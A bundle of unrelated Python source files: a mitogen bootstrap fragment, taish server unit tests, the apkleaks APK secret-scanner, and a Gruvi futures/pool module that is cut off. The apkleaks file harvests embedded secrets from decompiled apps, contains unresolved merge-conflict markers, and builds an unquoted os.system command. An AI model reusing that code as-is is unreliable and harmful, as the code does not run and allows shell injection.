handle=SHUTDOWN,
policy=has_parent_authority,
)
self.router.add_handler(
fn=self._on_call_service_msg,
handle=CALL_SERVICE,
policy=has_parent_authority,
)
self.master = Context(self.router, 0, 'master')
parent_id = self.config['parent_ids'][0]
if parent_id == 0:
self.parent = self.master
else:
self.parent = Context(self.router, parent_id, 'parent')
in_fd = self.config.get('in_fd', 100)
out_fd = self.config.get('out_fd', 1)
self.stream = Stream(self.router, parent_id)
self.stream.name = 'parent'
self.stream.accept(in_fd, out_fd)
self.stream.receive_side.keep_alive = False
listen(self.stream, 'disconnect', self._on_parent_disconnect)
listen(self.broker, 'exit', self._on_broker_exit)
os.close(in_fd)
def _reap_first_stage(self):
try:
os.wait() # Reap first stage.
except OSError:
pass # No first stage exists (e.g. fakessh)
def _setup_logging(self):
self.log_handler = LogHandler(self.master)
root = logging.getLogger()
root.setLevel(self.config['log_level'])
root.handlers = [self.log_handler]
if self.config['debug']:
enable_debug_logging()
def _setup_importer(self):
importer = self.config.get('importer')
if importer:
importer._install_handler(self.router)
importer._context = self.parent
else:
core_src_fd = self.config.get('core_src_fd', 101)
if core_src_fd:
fp = os.fdopen(core_src_fd, 'rb', 1)
try:
core_src = fp.read()
# Strip "ExternalContext.main()" call from last line.
core_src = b('\n').join(core_src.splitlines()[:-1])
finally:
fp.close()
else:
core_src = None
importer = Importer(
self.router,
self.parent,
core_src,
self.config.get('whitelist', ()),
self.config.get('blacklist', ()),
)
self.importer = importer
self.router.importer = importer
sys.meta_path.append(self.importer)
def _setup_package(self):
global mitogen
mitogen = imp.new_module('mitogen')
mitogen.__package__ = 'mitogen'
mitogen.__path__ = []
mitogen.__loader__ = self.importer
mitogen.main = lambda *args, **kwargs: (lambda func: None)
mitogen.core = sys.modules['__main__']
mitogen.core.__file__ = 'x/mitogen/core.py' # For inspect.getsource()
mitogen.core.__loader__ = self.importer
sys.modules['mitogen'] = mitogen
sys.modules['mitogen.core'] = mitogen.core
del sys.modules['__main__']
def _setup_globals(self):
mitogen.is_master = False
mitogen.__version__ = self.config['version']
mitogen.context_id = self.config['context_id']
mitogen.parent_ids = self.config['parent_ids'][:]
mitogen.parent_id = mitogen.parent_ids[0]
def _setup_stdio(self):
# We must open this prior to closing stdout, otherwise it will recycle
# a standard handle, the dup2() will not error, and on closing it, we
# lose a standrd handle, causing later code to again recycle a standard
# handle.
fp = open('/dev/null')
# When sys.stdout was opened by the runtime, overwriting it will not
# cause close to be called. However when forking from a child that
# previously used fdopen, overwriting it /will/ cause close to be
# called. So we must explicitly close it before IoLogger overwrites the
# file descriptor, otherwise the assignment below will cause stdout to
# be closed.
sys.stdout.close()
sys.stdout = None
try:
os.dup2(fp.fileno(), 0)
os.dup2(fp.fileno(), 1)
os.dup2(fp.fileno(), 2)
finally:
fp.close()
self.stdout_log = IoLogger(self.broker, 'stdout', 1)
self.stderr_log = IoLogger(self.broker, 'stderr', 2)
# Reopen with line buffering.
sys.stdout = os.fdopen(1, 'w', 1)
def main(self):
self._setup_master()
try:
try:
self._setup_logging()
self._setup_importer()
self._reap_first_stage()
if self.config.get('setup_package', True):
self._setup_package()
self._setup_globals()
if self.config.get('setup_stdio', True):
self._setup_stdio()
self.dispatcher = Dispatcher(self)
self.router.register(self.parent, self.stream)
self.log_handler.uncork()
sys.executable = os.environ.pop('ARGV0', sys.executable)
_v and LOG.debug('Connected to %s; my ID is %r, PID is %r',
self.parent, mitogen.context_id, os.getpid())
_v and LOG.debug('Recovered sys.executable: %r', sys.executable)
self.dispatcher.run()
_v and LOG.debug('ExternalContext.main() normal exit')
except KeyboardInterrupt:
LOG.debug('KeyboardInterrupt received, exiting gracefully.')
except BaseException:
LOG.exception('ExternalContext.main() crashed')
raise
finally:
self.broker.shutdown()
self.broker.join()
|
test_base.py | import unittest
import subprocess as sp
import threading
import os
import time
import taish
TAI_TEST_MODULE_LOCATION = os.environ.get("TAI_TEST_MODULE_LOCATION", "")
if not TAI_TEST_MODULE_LOCATION:
TAI_TEST_MODULE_LOCATION = "0"
TAI_TEST_TAISH_SERVER_ADDRESS = os.environ.get("TAI_TEST_TAISH_SERVER_ADDRESS", "")
if not TAI_TEST_TAISH_SERVER_ADDRESS:
TAI_TEST_TAISH_SERVER_ADDRESS = taish.DEFAULT_SERVER_ADDRESS
TAI_TEST_TAISH_SERVER_PORT = os.environ.get("TAI_TEST_TAISH_SERVER_PORT", "")
if not TAI_TEST_TAISH_SERVER_PORT:
TAI_TEST_TAISH_SERVER_PORT = taish.DEFAULT_SERVER_PORT
TAI_TEST_NO_LOCAL_TAISH_SERVER = (
True if os.environ.get("TAI_TEST_NO_LOCAL_TAISH_SERVER", "") else False
)
def output_reader(proc):
for line in iter(proc.stdout.readline, b""):
print("taish-server: {}".format(line.decode("utf-8")), end="")
class TestTAI(unittest.TestCase):
def setUp(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
proc = sp.Popen("taish_server", stderr=sp.STDOUT, stdout=sp.PIPE)
self.d = threading.Thread(target=output_reader, args=(proc,))
self.d.start()
self.proc = proc
time.sleep(5) # wait for the server to be ready
def tearDown(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
self.proc.terminate()
self.proc.wait(timeout=1)
self.d.join()
self.proc.stdout.close()
def test_list(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.list()
self.assertNotEqual(m, None)
self.assertTrue(TAI_TEST_MODULE_LOCATION in m)
module = m[TAI_TEST_MODULE_LOCATION]
print("module oid: 0x{:x}".format(module.oid))
def test_taish_list(self):
output = sp.run(
[
"taish",
"--port",
TAI_TEST_TAISH_SERVER_PORT,
"--addr",
TAI_TEST_TAISH_SERVER_ADDRESS,
"-c",
"list",
],
capture_output=True,
)
self.assertEqual(output.returncode, 0)
self.assertNotEqual(output.stdout.decode(), "")
self.assertEqual(output.stderr.decode(), "")
def test_get_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
self.assertEqual(m.location, TAI_TEST_MODULE_LOCATION)
print("module oid: 0x{:x}".format(m.oid))
def test_get_netif(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
netif = m.get_netif()
self.assertNotEqual(netif, None)
self.assertEqual(netif.index, 0)
print("netif oid: 0x{:x}".format(netif.oid))
def test_get_hostif(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
hostif = m.get_hostif()
self.assertNotEqual(hostif, None)
self.assertEqual(hostif.index, 0)
print("hostif oid: 0x{:x}".format(hostif.oid))
def test_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
for metadata in m.list_attribute_metadata():
try:
v = m.get(metadata)
except taish.TAIException as e:
v = e.msg
print("{}: {}".format(metadata.short_name, v))
def test_netif(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
netif = m.get_netif()
for metadata in netif.list_attribute_metadata():
try:
v = netif.get(metadata)
except taish.TAIException as e:
v = e.msg
print("{}: {}".format(metadata.short_name, v))
def test_netif_set_output_power(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
netif = m.get_netif()
netif.set("output-power", "-4")
self.assertEqual(round(float(netif.get("output-power"))), -4)
netif.set("output-power", "-5")
self.assertEqual(round(float(netif.get("output-power"))), -5)
def test_netif_set_modulation_format(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
netif = m.get_netif()
netif.set("modulation-format", "dp-64-qam")
self.assertEqual(netif.get("modulation-format"), "dp-64-qam")
netif.set("modulation-format", "dp-qpsk")
self.assertEqual(netif.get("modulation-format"), "dp-qpsk")
def test_hostif(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
hostif = m.get_hostif()
for metadata in hostif.list_attribute_metadata():
try:
v = hostif.get(metadata)
except taish.TAIException as e:
v = e.msg
print("{}: {}".format(metadata.short_name, v))
def test_hostif_set_fec(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
hostif = m.get_hostif()
hostif.set("fec-type", "rs")
self.assertEqual(hostif.get("fec-type"), "rs")
hostif.set("fec-type", "fc")
self.assertEqual(hostif.get("fec-type"), "fc")
hostif.set("fec-type", "none")
self.assertEqual(hostif.get("fec-type"), "none")
def test_hostif_set_loopback(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
hostif = m.get_hostif()
hostif.set("loopback-type", "shallow")
self.assertEqual(hostif.get("loopback-type"), "shallow")
hostif.set("loopback-type", "deep")
self.assertEqual(hostif.get("loopback-type"), "deep")
hostif.set("loopback-type", "none")
self.assertEqual(hostif.get("loopback-type"), "none")
def test_remove(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
l = cli.list()
self.assertNotEqual(l, None)
self.assertTrue(TAI_TEST_MODULE_LOCATION in l)
module = l[TAI_TEST_MODULE_LOCATION]
self.assertNotEqual(module.oid, 0)
self.assertEqual(len(module.netifs), 1)
self.assertEqual(len(module.hostifs), 2)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
netif = m.get_netif()
cli.remove(netif.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.netifs), 0)
hostif = m.get_hostif()
cli.remove(hostif.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.hostifs), 1)
hostif = m.get_hostif(1)
cli.remove(hostif.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.hostifs), 0)
cli.remove(module.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(module.oid, 0)
def test_create(self):
self.test_remove()
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
with self.assertRaises(Exception):
cli.get_module(TAI_TEST_MODULE_LOCATION)
cli.create("module", [("location", TAI_TEST_MODULE_LOCATION)])
l = cli.list()
self.assertNotEqual(l, None)
self.assertTrue(TAI_TEST_MODULE_LOCATION in l)
module = l[TAI_TEST_MODULE_LOCATION]
self.assertNotEqual(module.oid, 0)
self.assertEqual(len(module.netifs), 0)
self.assertEqual(len(module.hostifs), 0)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertEqual(int(m.get("num-network-interfaces")), 1)
self.assertEqual(int(m.get("num-host-interfaces")), 2)
cli.create("netif", [("index", 0)], m.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.netifs), 1)
cli.create("hostif", [("index", 0)], m.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.hostifs), 1)
cli.create("hostif", [("index", 1)], m.oid)
l = cli.list()
module = l[TAI_TEST_MODULE_LOCATION]
self.assertEqual(len(module.hostifs), 2)
def test_get_set_multiple(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
hostif = m.get_hostif()
v = hostif.get_multiple(["loopback-type", "fec-type"])
self.assertEqual(len(v), 2)
self.assertEqual(v[0], "none")
self.assertEqual(v[1], "none")
hostif.set_multiple([("loopback-type", "shallow"), ("fec-type", "rs")])
v = hostif.get_multiple(["loopback-type", "fec-type"])
self.assertEqual(len(v), 2)
self.assertEqual(v[0], "shallow")
self.assertEqual(v[1], "rs")
class TestTAIWithConfig(unittest.TestCase):
def setUp(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
proc = sp.Popen(
["taish_server", "-f", "config.json"], stderr=sp.STDOUT, stdout=sp.PIPE
)
self.d = threading.Thread(target=output_reader, args=(proc,))
self.d.start()
self.proc = proc
time.sleep(5) # wait for the server to be ready
def test_set_admin_status_attribute_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
print("module oid: 0x{:x}".format(m.oid))
self.assertEqual(m.get("admin-status"), "down")
m.set("admin-status", "up")
self.assertEqual(m.get("admin-status"), "up")
def test_set_custom_attribute_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
print("module oid: 0x{:x}".format(m.oid))
self.assertEqual(m.get("custom"), "true")
m.set("custom", "false")
self.assertEqual(m.get("custom"), "false")
def test_set_custom_list_attribute_module(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
self.assertNotEqual(m, None)
print("module oid: 0x{:x}".format(m.oid))
m.set("custom-list", "1,2,3,4")
self.assertEqual(m.get("custom-list"), "1,2,3,4")
m.set("custom-list", "")
self.assertEqual(m.get("custom-list"), "")
def test_set_custom_list_attribute_module_taish(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.get_module(TAI_TEST_MODULE_LOCATION)
output = sp.run(
[
"taish",
"--port",
TAI_TEST_TAISH_SERVER_PORT,
"--addr",
TAI_TEST_TAISH_SERVER_ADDRESS,
"-c",
f"module {TAI_TEST_MODULE_LOCATION}; set custom-list 1,2,3,4",
],
capture_output=True,
)
self.assertEqual(output.returncode, 0)
self.assertEqual(m.get("custom-list"), "1,2,3,4")
output = sp.run(
[
"taish",
"--port",
TAI_TEST_TAISH_SERVER_PORT,
"--addr",
TAI_TEST_TAISH_SERVER_ADDRESS,
"-c",
f"module {TAI_TEST_MODULE_LOCATION}; set custom-list",
],
capture_output=True,
)
self.assertEqual(output.returncode, 0)
self.assertEqual(m.get("custom-list"), "")
def tearDown(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
self.proc.terminate()
self.proc.wait(timeout=1)
self.d.join()
self.proc.stdout.close()
class TestTAIWithoutObjectCreation(unittest.TestCase):
def setUp(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
proc = sp.Popen(["taish_server", "-n"], stderr=sp.STDOUT, stdout=sp.PIPE)
self.d = threading.Thread(target=output_reader, args=(proc,))
self.d.start()
self.proc = proc
time.sleep(5) # wait for the server to be ready
def test_list(self):
cli = taish.Client(TAI_TEST_TAISH_SERVER_ADDRESS, TAI_TEST_TAISH_SERVER_PORT)
m = cli.list()
self.assertNotEqual(m, None)
self.assertTrue(TAI_TEST_MODULE_LOCATION in m)
module = m[TAI_TEST_MODULE_LOCATION]
print("module oid: 0x{:x}".format(module.oid))
def test_taish_list(self):
output = sp.run(
[
"taish",
"--port",
TAI_TEST_TAISH_SERVER_PORT,
"--addr",
TAI_TEST_TAISH_SERVER_ADDRESS,
"-c",
"list",
],
capture_output=True,
)
self.assertEqual(output.returncode, 0)
self.assertNotEqual(output.stdout.decode(), "")
self.assertEqual(output.stderr.decode(), "")
def tearDown(self):
if TAI_TEST_NO_LOCAL_TAISH_SERVER:
return
self.proc.terminate()
self.proc.wait(timeout=1)
self.d.join()
self.proc.stdout.close()
if __name__ == "__main__":
unittest.main()
|
apkleaks.py | #!/usr/bin/env python3
from apkleaks.colors import clr
from contextlib import closing
from distutils.spawn import find_executable
from pyaxmlparser import APK
from urllib.request import urlopen
from zipfile import ZipFile
import io
import json
import logging.config
import mimetypes
import numpy
import os
import re
import shutil
import sys
import tempfile
import threading
class APKLeaks:
def __init__(self, args):
self.file = args.file
self.prefix = "apkleaks-"
self.tempdir = tempfile.mkdtemp(prefix=self.prefix)
self.main_dir = os.path.dirname(os.path.realpath(__file__))
self.output = tempfile.mkstemp(suffix=".txt", prefix=self.prefix)[1] if args.output is None else args.output
self.pattern = self.main_dir + "/../config/regexes.json" if args.pattern is None else args.pattern
self.jadx = find_executable("jadx") if find_executable("jadx") is not None else self.main_dir + "/../jadx/bin/jadx%s" % (".bat" if os.name == "nt" else "")
logging.config.dictConfig({"version": 1, "disable_existing_loggers": True})
def apk_info(self):
return APK(self.file)
def dependencies(self):
exter = "https://github.com/skylot/jadx/releases/download/v1.2.0/jadx-1.2.0.zip"
with closing(urlopen(exter)) as jadx:
with ZipFile(io.BytesIO(jadx.read())) as zfile:
zfile.extractall(self.main_dir + "/../jadx")
os.chmod(self.jadx, 33268)
def write(self, message, color):
sys.stdout.write("%s%s%s" % (color, message, clr.ENDC))
def writeln(self, message, color):
self.write(message + "\n", color)
def integrity(self):
if os.path.exists(self.jadx) is False:
self.writeln("Can't find jadx binary.", clr.WARNING)
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
while True:
self.write("Do you want to download jadx? (Y/n) ", clr.OKBLUE)
choice = input().lower()
if choice == "":
choice = valid["y"]
break
elif choice in valid:
choice = valid[choice]
break
else:
self.writeln("\nPlease respond with 'yes' or 'no' (or 'y' or 'n').", clr.WARNING)
if choice:
self.writeln("** Downloading jadx...\n", clr.OKBLUE)
self.dependencies()
else:
sys.exit(self.writeln("Aborted.", clr.FAIL))
if os.path.isfile(self.file) is True:
try:
self.apk = self.apk_info()
except Exception as e:
sys.exit(self.writeln(str(e), clr.WARNING))
else:
return self.apk
else:
sys.exit(self.writeln("It's not a valid file!", clr.WARNING))
def decompile(self):
self.writeln("** Decompiling APK...", clr.OKBLUE)
with ZipFile(self.file) as zipped:
try:
dex = self.tempdir + "/" + self.apk.package + ".dex"
with open(dex, "wb") as classes:
classes.write(zipped.read("classes.dex"))
except Exception as e:
<<<<<<< HEAD
exit(self.writeln(str(e), clr.WARNING))
dec = "%s %s -d %s -j %s --deobf" % (self.jadx, dex, self.tempdir, 10)
=======
sys.exit(self.writeln(str(e), clr.WARNING))
dec = "%s %s -d %s --deobf" % (self.jadx, dex, self.tempdir)
>>>>>>> f2f894c (Refactor code quality issues)
os.system(dec)
return self.tempdir
def unique(self, list):
x = numpy.array(list)
return (numpy.unique(x))
def finder(self, pattern, path):
matcher = re.compile(pattern)
found = []
for path, _, files in os.walk(path):
for fn in files:
filepath = os.path.join(path, fn)
if mimetypes.guess_type(filepath)[0] is None:
continue
with open(filepath) as handle:
for lineno, line in enumerate(handle):
mo = matcher.search(line)
if mo:
found.append(mo.group())
return self.unique(found)
def extract(self, name, matches):
output = open(self.output, "a+")
if matches:
stdout = ("[%s]" % (name))
self.writeln("\n" + stdout, clr.OKGREEN)
output.write(stdout + "\n")
for secret in matches:
if name == "LinkFinder" and re.match(r"^.(L[a-z]|application|audio|fonts|image|layout|multipart|plain|text|video).*\/.+", secret) is not None:
continue
stdout = ("- %s" % (secret))
print(stdout)
output.write(stdout + "\n")
output.write("\n")
output.close()
def scanning(self):
self.writeln("\n** Scanning against '%s'" % (self.apk.package), clr.OKBLUE)
with open(self.pattern) as regexes:
regex = json.load(regexes)
for name, pattern in regex.items():
if isinstance(pattern, list):
for pattern in pattern:
thread = threading.Thread(target = self.extract, args = (name, self.finder(pattern, self.tempdir)))
thread.start()
else:
thread = threading.Thread(target = self.extract, args = (name, self.finder(pattern, self.tempdir)))
thread.start()
def __del__(self):
print("%s\n** Results saved into '%s%s%s%s'%s" % (clr.OKBLUE, clr.ENDC, clr.OKGREEN, self.output, clr.OKBLUE, clr.ENDC))
try:
shutil.rmtree(self.tempdir)
except Exception:
return |
futures.py | #
# This file is part of Gruvi. Gruvi is free software available under the
# terms of the MIT license. See the file "LICENSE" that was provided
# together with this source file for the licensing terms.
#
# Copyright (c) 2012-2014 the Gruvi authors. See the file "AUTHORS" for a
# complete list.
from __future__ import absolute_import, print_function
import sys
import time
import threading
import pyuv
from . import fibers, compat, logging, util
from .hub import switchpoint, switch_back
from .sync import Event, Queue
from .errors import Timeout, Cancelled
from .callbacks import add_callback, remove_callback, run_callbacks
__all__ = ['Future', 'PoolBase', 'FiberPool', 'ThreadPool', 'get_io_pool',
'get_cpu_pool', 'blocking', 'wait', 'as_completed']
class Future(object):
"""The state of an asynchronous function call.
A future captures the state and the future result of an asynchronous
function call. Futures are not instantiated directly but are created by a
:class:`PoolBase` implementation. The pool accepts work in the form of a
Python function via its :meth:`~PoolBase.submit` method. This method
returns a future representing the state and the result of the function that
will be executed asynchronously in the pool.
A future progresses through different states during its lifecyle:
* Initially the future is in the pending state.
* Once the pool has capacity to run the function, it moves to the running
state. In this state, :meth:`~Future.running` will return ``True``.
* Once the function completes or raises an exception, the future moves to
the done state. In this state, :meth:`~Future.done` will return ``True``.
The future and the asynchronous function it represents are two distinct
entities but for brevity the terms are often used interchangeably,
including in this manual. For example, if the asynchronous function
completes it is said that the future has completed, and cancelling the
future really means cancelling the asynchronous function it is capturing
the state of.
"""
__slots__ = ('_result', '_state', '_lock', '_done', '_callbacks')
S_PENDING, S_RUNNING, S_RUNNING_NOCANCEL, S_DONE, S_EXCEPTION = range(5)
def __init__(self):
self._result = None
self._state = self.S_PENDING
self._lock = threading.Lock()
self._done = Event()
self._callbacks = None
def running(self):
"""Return whether this future is running. """
return self._state in (self.S_RUNNING, self.S_RUNNING_NOCANCEL)
def cancelled(self):
"""Return whether this future was successfully cancelled."""
return self._state == self.S_EXCEPTION and isinstance(self._result, Cancelled)
def done(self):
"""Return whether this future is done."""
return self._state in (self.S_DONE, self.S_EXCEPTION)
def cancel(self):
"""Cancel the execution of the async function, if possible.
This method marks the future as done and sets the :class:`Cancelled`
exception.
A future that is not running can always be cancelled. However when a
future is running, the ability to cancel it depends on the pool
implementation. For example, a fiber pool can cancel running fibers but
a thread pool cannot.
Return ``True`` if the future could be cancelled, ``False`` otherwise.
"""
# We leverage/abuse our _done Event's thread lock as our own lock.
# Since it's a private copy it should be OK, and it saves some memory.
# Just be sure that we don't modify the event with the lock held.
with self._lock:
if self._state not in (self.S_PENDING, self.S_RUNNING):
return False
self._result = Cancelled('cancelled by Future.cancel()')
self._state = self.S_EXCEPTION
self._done.set()
return True
@switchpoint
def result(self, timeout=None):
"""Wait for the future to complete and return its result.
If the function returned normally, its return value is returned here.
If the function raised an exception, the exception is re-raised here.
"""
if not self._done.wait(timeout):
raise Timeout('timeout waiting for future')
# No more state changes after _done is set so no lock needed.
if self._state == self.S_EXCEPTION:
raise compat.saved_exc(self._result)
return self._result
@switchpoint
def exception(self, timeout=None):
"""Wait for the async function to complete and return its exception.
If the function did not raise an exception this returns ``None``.
"""
if not self._done.wait(timeout):
raise Timeout('timeout waiting for future')
if self._state == self.S_EXCEPTION:
return self._result
def add_done_callback(self, callback, *args):
"""Add a callback that gets called when the future completes.
The callback will be called in the context of the fiber that sets the
future's result. The callback is called with the positional arguments
*args* provided to this method.
The return value is an opaque handle that can be used with
:meth:`~gruvi.Future.remove_done_callback` to remove the callback.
If the future has already completed, then the callback is called
immediately from this method and the return value will be ``None``.
"""
with self._lock:
if self._state not in (self.S_DONE, self.S_EXCEPTION):
return add_callback(self, callback, args)
callback(*args)
def remove_done_callback(self, handle):
"""Remove a callback that was added by :meth:`~Future.add_done_callback`.
It is not an error to remove a callback that was already removed.
"""
with self._lock:
remove_callback(self, handle)
# The following are internal functions used by the pool implementations.
def set_running(self, can_cancel=False):
# Set the future in the running state.
with self._lock:
if self._state != self.S_PENDING:
return
self._state = self.S_RUNNING if can_cancel else self.S_RUNNING_NOCANCEL
def set_result(self, result):
# Mark the future as done and set its result. If the future has already
# completed, then this does nothing.
with self._lock:
if self._state in (self.S_DONE, self.S_EXCEPTION):
return
self._result = result
self._state = self.S_DONE
self._done.set()
run_callbacks(self)
def set_exception(self, exception):
# Mark the future as done and set an exception. If the future has
# already completed, then this does nothing.
with self._lock:
if self._state in (self.S_DONE, self.S_EXCEPTION):
return
self._result = exception
self._state = self.S_EXCEPTION
self._done.set()
run_callbacks(self)
class PoolBase(object):
"""Base class for pools.
A pool contains a set of workers that can execute function calls
asynchronously.
"""
_PoolClosing = object()
def __init__(self, maxsize=None, minsize=0, name=None):
"""
The *maxsize* argument specifies the maximum numbers of workers that
will be created in the pool. If *maxsize* is ``None`` then the pool can
grow without bound.
Normally the pool starts with zero workers and grows up to *maxsize* on
demand. The *minsize* parameter can be used to change this behavior an
make sure that there will always be at least this many workers in the
pool.
The *name* parameter gives a name for this pool. The pool name will
show up in log messages related to the pool.
"""
self._maxsize = maxsize
self._name = name or util.objref(self)
self._minsize = minsize
self._log = logging.get_logger()
self._workers = set()
# We never switch while holding the lock which means we can use a
# threading lock which is more efficient than a fiber lock.
self._lock = threading.Lock()
self._queue = Queue()
self._closing = False
self._closed = Event()
self._next_worker = 0
for i in range(self._minsize):
self._spawn_worker()
if self._minsize:
self._log.debug('pre-spawned {} workers', self._minsize)
@property
def maxsize(self):
"""The maximum size of this pool."""
return self._maxsize
@property
def minsize(self):
"""The minimum size of this pool."""
return self._minsize
@property
def name(self):
"""The pool name."""
return self._name
def _current_worker(self):
raise NotImplementedError
def _create_worker(self):
raise NotImplementedError
def _start_work(self, fut):
raise NotImplementedError
def _worker_main(self):
# Main function for each worker in the pool.
try:
while True:
work = None or self._queue.get()
try:
if work is self._PoolClosing:
self._log.debug('worker shutting down')
break
func, args, fut = work
if fut.cancelled():
continue # Future was cancelled before it could be run.
self._start_work(fut)
try:
result = func(*args)
fut.set_result(result)
except Cancelled as e:
self._log.debug('worker was cancelled ({!s})', e)
# The future might have cancelled itself so make sure
# to set the exception, possibly unnecessarily.
fut.set_exception(e)
except:
# OK to catch all since we will exit.
self._log.debug('uncaught exception in worker', exc_info=True)
fut.set_exception(sys.exc_info()[1])
break
finally:
self._queue.task_done()
finally:
with self._lock:
self._workers.remove(self._current_worker())
if work is self._PoolClosing and self._workers:
self._queue.put_nowait(work)
elif work is self._PoolClosing:
self._closed.set()
else:
self._spawn_workers()
def _spawn_worker(self):
# Spawn a single new worker. The lock must be held.
name = '{}:{}'.format(self._name, self._next_worker)
self._next_worker += 1
self._workers.add(self._create_worker(name))
def _spawn_workers(self):
# Spawn new workers if required. The lock must be held.
# Note that holding the lock prevents work from being added to the
# queue but not from being drained. The result is that the value of
# 'tospawn' we calculate below may be too high. However, since we limit
# the number of workers we spin up in one batch, this is not a big deal
# and actually simplifies the overall locking significantly (we cannot
# do a _queue._get() under a plain lock as it might block the thread).
nworkers = len(self._workers)
queued = self._queue.qsize()
active_workers = self._queue.unfinished_tasks - queued
idle_workers = nworkers - active_workers
wanted = max(0, queued - idle_workers, self._minsize - nworkers)
mayspawn = max(0, self._maxsize or wanted - nworkers)
tospawn = min(10, wanted, mayspawn)
for i in range(tospawn):
self._spawn_worker()
if tospawn:
self._log.debug('spawned {} workers, total = {}', tospawn, len(self._workers))
def submit(self, func, *args):
"""Run *func* asynchronously.
The function is run in the pool which will run it asynchrously. The
function is called with positional argument *args*.
The return value is a :class:`Future` that captures the state and the
future result of the asynchronous function call.
"""
with self._lock:
if self._closing:
raise RuntimeError('pool is closing/closed')
result = Future()
self._queue.put_nowait((func, args, result))
self._spawn_workers()
return result
@switchpoint
def map(self, func, *iterables, **kwargs):
"""Apply *func* to the elements of the sequences in *iterables*.
All invocations of *func* are run in the pool. If multiple iterables
are provided, then *func* must take this many arguments, and is applied
with one element from each iterable. All iterables must yield the same
number of elements.
An optional *timeout* keyword argument may be provided to specify a
timeout.
This returns a generator yielding the results.
"""
with self._lock:
if self._closing:
raise RuntimeError('pool is closing/closed')
timeout = kwargs.pop('timeout', None)
futures = []
for args in zip(*iterables):
result = Future()
self._queue.put_nowait((func, args, result))
futures.append(result)
self._spawn_workers()
try:
with switch_back(timeout):
for future in futures:
yield future.result()
except Exception:
# Timeout, GeneratorExit or future.set_exception()
for future in futures:
if not future.done():
future.cancel()
raise
@switchpoint
def join(self):
"""Wait until all jobs in the pool have completed.
New submissions are not blocked. This means that if you continue adding
work via :meth:`~PoolBase.submit` or :meth:`~PoolBase.map` then this
method might never finish.
"""
self._queue.join()
@switchpoint
def close(self):
"""Close the pool and wait for all workers to exit.
New submissions will be blocked. Workers will exit once their current
job is finished. This method will return after all workers have exited.
"""
with self._lock:
if self._closing:
return
self._closing = True
if not self._workers:
self._closed.set()
return
self._queue.put_nowait(self._PoolClosing)
self._closed.wait()
class FiberPool(PoolBase):
"""A pool that uses fiber workers."""
def __init__(self, *args, **kwargs):
# Provided in order not to repeat the PoolBase.__init__ doc string.
super(FiberPool, self).__init__(*args, **kwargs)
def _current_worker(self):
return fibers.current_fiber()
def _create_worker(self, name):
fiber = fibers.Fiber(self._worker_main, name=name)
fiber.start()
return fiber
def _cancel_fiber(self, fut, fiber):
if fut.cancelled():
